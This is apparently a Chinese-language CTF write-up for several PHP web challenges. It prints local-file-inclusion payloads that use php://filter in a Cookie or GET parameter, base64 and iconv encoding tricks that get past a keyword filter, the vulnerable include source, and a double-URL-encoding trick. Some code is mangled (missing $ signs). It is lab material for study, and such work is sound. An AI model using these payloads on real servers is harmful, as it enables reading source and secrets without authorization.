fileinclude
可以看到正常回显里面显示lan参数有cookie值表示为language
然后进行一个判断,如果参数不是等于英语,就加上.php,那我们就可以在前面进行注入一个参数,即flag,
payload:COOKIE:language=flag
发现还是无回显到flag.php里
可能存在的文件读取限制或过滤机制
利用 php://filter 和 language Cookie 组合,通过指定convert.base64 - encode,可以将读取到的文件内容进行 Base64 编码
Payload:Cookie: language=php://filter/convert.base64-encode/resource=flag
缘由:因为服务器可能只检查直接的文件路径访问,而没有考虑到经过编码转换的情况。
得到回显值为PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezhmYzdhY2U0MzE0OTg3Mjk0ZWZiMTFmMDM4ZDM0MTM3fSI7DQo/Pg==
解码可得
file_include
<?php highlight_file(FILE); include("./check.php"); if(isset(_GET\['filename'\])){ filename = _GET\['filename'\]; include(filename); } ?>
当使用 convert.iconv.UTF - 8.UCS - 2 过滤器时,文件内容的编码被改变,原本在 UTF - 8 编码下能被识别的危险字符或模式,在 UCS - 2 编码下可能就无法被识别,从而绕过了服务器的过滤机制。
Payload:?filename=php://filter/convert.iconv.UTF-8.UCS-2/resource=flag.php
check.php的内容为:
<?php if(_GET\["filename"\]){ preg_match_username = 'return preg_match("/base|be|encode|print|zlib|quoted|write|rot13|read|string/i", _GET\["filename"\]);'; if (eval(preg_match_username)) { die("do not hack!"); } } ## 题目名称-文件包含 通过一开始的测试,我们可以发现显示我们有正常的过滤器,但是参数不对,那我们就开始进行模糊测试,对常见字符进行编码转换,发现还是不对,再对编码格式进行测试,先去搜索php支持的编码格式字典 放到爆破里去进行爆破,解出    Payload:?filename=php://filter/convert.iconv.BIG-5*.UCS-4*/resource=flag.php 解出该flag  ## PHP2 参考网上大佬的资料发现,这里要用到index.phps来查看php的源代码(没用的只是又增加了)  代码审计发现他要求id=admin的编码,所以我们进行编码后发现还是显示错误,后面发现经过一次编码,浏览器会自动进行一次解码环节,所以我们要进行二次编码才可以,得出flag 